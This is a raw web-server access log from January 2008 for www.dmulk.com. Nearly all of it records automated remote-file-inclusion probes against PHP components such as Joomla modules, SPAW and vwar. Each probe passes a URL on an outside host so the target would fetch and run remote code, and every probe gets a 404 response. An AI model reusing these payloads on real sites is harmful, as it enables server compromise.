209.129.16.106 - - [30/Jan/2008:06:01:54 -0800] "GET /index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.143.142.163 - - [30/Jan/2008:06:02:01 -0800] "GET /logs/access_071228.log//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Jan/2008:06:02:01 -0800] "GET //ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Jan/2008:06:02:04 -0800] "GET /logs/access_071228.log//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.143.142.163 - - [30/Jan/2008:06:02:04 -0800] "GET //ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Jan/2008:06:02:05 -0800] "GET /logs//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Jan/2008:06:02:16 -0800] "GET /logs/access_071228.log//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [30/Jan/2008:06:02:17 -0800] "GET //ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.143.142.163 - - [30/Jan/2008:06:02:17 -0800] "GET /logs//ctlog/dir_module/include_once.php?include_file=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.93.255.93 - - [30/Jan/2008:06:02:54 -0800] "GET /logs/access_071229.log//convert/mvcw.php?vwar_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:06:03:02 -0800] "GET /logs/access_071228.log/index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:06:03:02 -0800] "GET /index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.204.17.137 - - [30/Jan/2008:06:03:02 -0800] "GET /logs/index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.10.208.226 - - [30/Jan/2008:06:03:32 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.10.208.226 - - [30/Jan/2008:06:03:32 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.10.208.226 - - [30/Jan/2008:06:03:33 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.254.203.35 - - [30/Jan/2008:06:03:48 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://www.rantandroll.com/vbgsitemap/files/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:04:21 -0800] "GET /logs/access_071230.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:04:22 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.156 - - [30/Jan/2008:06:05:17 -0800] "GET /tmp/?N=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:45 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:46 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:46 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:47 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:47 -0800] "GET /convert/mvcw.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:48 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:05:59 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:06:02 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.191.9 - - [30/Jan/2008:06:07:10 -0800] "GET /logs/access_080112.log//templates/mangobery/footer.sample.php?Site_Path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.214.232 - - [30/Jan/2008:06:08:19 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.139 - - [30/Jan/2008:06:08:31 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:08:51 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.92.145.181 - - [30/Jan/2008:06:09:14 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.92.145.181 - - [30/Jan/2008:06:09:14 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [30/Jan/2008:06:10:03 -0800] "GET /logs/access_071228.log/index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [30/Jan/2008:06:10:04 -0800] "GET /index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [30/Jan/2008:06:10:04 -0800] "GET /logs/index.php?pagina=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:10:09 -0800] "GET /logs/access_080106.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.78.173.10 - - [30/Jan/2008:06:11:36 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [30/Jan/2008:06:11:37 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [30/Jan/2008:06:11:37 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2008:06:11:40 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2008:06:11:40 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2008:06:11:40 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [30/Jan/2008:06:11:40 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:46 -0800] "GET /logs/access_071225.log//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.10.208.226 - - [30/Jan/2008:06:12:47 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:53 -0800] "GET //hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:53 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:55 -0800] "GET /logs//hysteresis//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:55 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:57 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:12:59 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:13:00 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:13:01 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.191.68.75 - - [30/Jan/2008:06:13:11 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.191.68.75 - - [30/Jan/2008:06:13:12 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:06:13:18 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:06:13:18 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:06:13:18 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:13:21 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:13:22 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.201.40.74 - - [30/Jan/2008:06:13:23 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:14:19 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.32.128.178 - - [30/Jan/2008:06:14:22 -0800] "GET /index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [30/Jan/2008:06:14:50 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [30/Jan/2008:06:14:50 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:10 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:10 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:10 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:16 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:16 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:16 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:19 -0800] "GET /logs/access_071225.log//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:19 -0800] "GET //pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.34.73 - - [30/Jan/2008:06:15:19 -0800] "GET /logs//pandadir/modules/My_eGallery/public/displayCategory.php?basepath=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:15:28 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.78.173.10 - - [30/Jan/2008:06:15:57 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [30/Jan/2008:06:16:29 -0800] "GET /logs/access_071229.log/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [30/Jan/2008:06:16:29 -0800] "GET /logs/index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.207 - - [30/Jan/2008:06:17:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [30/Jan/2008:06:17:04 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:17:53 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:17:54 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [30/Jan/2008:06:17:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:18:12 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.50.243.66 - - [30/Jan/2008:06:20:03 -0800] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.78.173.10 - - [30/Jan/2008:06:20:22 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:06:20:45 -0800] "GET //guestbook/admin.php/admin.php?include_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:06:20:45 -0800] "GET /logs//guestbook/admin.php/admin.php?include_path=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:06:21:00 -0800] "GET //log.details.html/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [30/Jan/2008:06:21:00 -0800] "GET /logs//log.details.html/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:07 -0800] "GET /logs/access_071228.log//ctlog/guestbook/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:07 -0800] "GET //ctlog/guestbook/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:08 -0800] "GET /logs//ctlog/guestbook/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:17 -0800] "GET /logs/access_071228.log//ctlog/dir_module/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:19 -0800] "GET //ctlog/dir_module/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.54.178.146 - - [30/Jan/2008:06:21:21 -0800] "GET /logs//ctlog/dir_module/include_once.php?include_file=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.9.138 - - [30/Jan/2008:06:23:05 -0800] "GET /send_reminders.php?includedir=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.151.162.98 - - [30/Jan/2008:06:25:43 -0800] "GET /index.php?s=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.23.104 - - [30/Jan/2008:06:26:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:26:49 -0800] "GET /logs/access_080112.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:26:49 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [30/Jan/2008:06:26:49 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:06:28:14 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:06:28:14 -0800] "GET /index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.239.150 - - [30/Jan/2008:06:28:14 -0800] "GET /logs/index.php?option=com_glossary&func=display&Itemid=s@bun&catid=http://hungernwnc.org/data/asc.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [30/Jan/2008:06:30:54 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [30/Jan/2008:06:30:54 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [30/Jan/2008:06:30:54 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:31:30 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:31:31 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:31:31 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.167.242 - - [30/Jan/2008:06:32:13 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [30/Jan/2008:06:32:14 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.167.242 - - [30/Jan/2008:06:32:14 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.24.106 - - [30/Jan/2008:06:32:22 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.167.242 - - [30/Jan/2008:06:33:17 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://sofularciftligi.com/forum/avatars/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
